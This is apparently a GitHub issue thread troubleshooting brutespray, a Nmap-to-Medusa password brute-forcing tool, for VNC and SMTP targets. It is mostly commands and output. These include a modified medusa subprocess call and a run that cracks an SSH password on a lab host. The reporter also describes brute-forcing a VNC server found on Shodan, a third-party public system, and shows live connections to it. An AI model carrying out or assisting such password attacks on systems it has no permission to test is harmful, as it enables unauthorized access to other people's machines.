Closed tokyoneon closed 6 years ago
when you are running brutespray you specify /root/Desktop/brutespray.xml
but your nmap is /root/Desktop/brutespray.gnmap
. would that be the issue? does the xml file exist?
i guess it should exist since it looks like medusa seems to start up...
i'm thinking the error might be occurring because parsing the xml will probably show vnc-1
vs vnc
. i think the matching there might fail.
Oh, sorry, forgot to clarify, I was alternative between an xml and gnmap. I got the same results using either. Just modified the gnmap and removed the "-1" and got this output:
Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)...
Output will be written to the folder: ./brutespray-output/ \
Brute-Forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [vnc] Host: 192.168.1.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456 (1 of 60 complete)
ACCOUNT CHECK: [vnc] Host: 192.168.1.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456789 (2 of 60 complete)
It started this time but stopped after 2 password attempts.
Tried changing medusa's verbosity level in the script, thought it might help debug.
p = subprocess.Popen(['medusa', '-v 6','-H', fname, uarg, userlist, parg, passlist, '-M', service, '-t', args.threads, '-n', port, '-T', args.hosts, cont], stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=-1)
Got this:
Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)...
Output will be written to the folder: ./brutespray-output/ \
Brute-Forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
GENERAL: Parallel Hosts: 1 Parallel Logins: 2
GENERAL: Total Hosts: 1
GENERAL: Total Users: 1
GENERAL: Total Passwords: 60
GENERAL: Medusa has finished.
What's interesting is bruteforcing SSH still works.
> ./brutespray.py --file '/root/Desktop/brutespray.gnmap' --username user --passlist '/root/Desktop/passwords.list' --service ssh
Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)...
Output will be written to the folder: ./brutespray-output/ \
Brute-Forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
GENERAL: Parallel Hosts: 1 Parallel Logins: 2
GENERAL: Total Hosts: 1
GENERAL: Total Users: 1
GENERAL: Total Passwords: 60
ACCOUNT CHECK: [ssh] Host: 192.168.1.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456789 (1 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456 (2 of 60 complete)
...
ACCOUNT CHECK: [ssh] Host: 192.168.1.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 11111111 (58 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: wonderhow2 (59 of 60 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.103 User: user Password: wonderhow2 [SUCCESS]
GENERAL: Medusa has finished.
Thought maybe it was my test SMTP/VNC servers but just tried using brutespray on a VNC server I found on Shodan. Using lsof
I could see medusa established a connection to the server (79.173.XX.XXX:5901) for a few moments...
> watch lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
medusa 5533 root 6u IPv4 27857 0t0 TCP 192.168.1.17:36604->79.173.XX.XXX:5901 (ESTABLISHED)
medusa 5533 root 7u IPv4 27858 0t0 TCP 192.168.1.17:36606->79.173.XX.XXX:5901 (ESTABLISHED)
But no output in my brutespray terminal.
Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)...
Output will be written to the folder: ./brutespray-output/ \
Brute-Forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
GENERAL: Parallel Hosts: 1 Parallel Logins: 2
GENERAL: Total Hosts: 1
GENERAL: Total Users: 1
GENERAL: Total Passwords: 60
GENERAL: Medusa has finished.
i tested on VNC metasploitable2, and it worked just fine. SMTP required an AUTH:PLAIN or AUTH:LOGIN argument which i added, i also enabled medusa errors to print out
v1.6.0, found in Kali, stopped working, so I tried cloning the git. But that didn't help. I'm not sure if this is a bug or maybe I'm misunderstanding the usage.
That's it, brutespray just quits with no warnings or errors. This happens with or without the
--service
and--output
args. Brutespray worked fine with SSH until I tried SMTP and VNC.I thought maybe it was my Nmap outputs but here's what I'm working with:
Read the file:
Nmap output:
The installation seemed to go over well:
And medusa is installed.
Any ideas?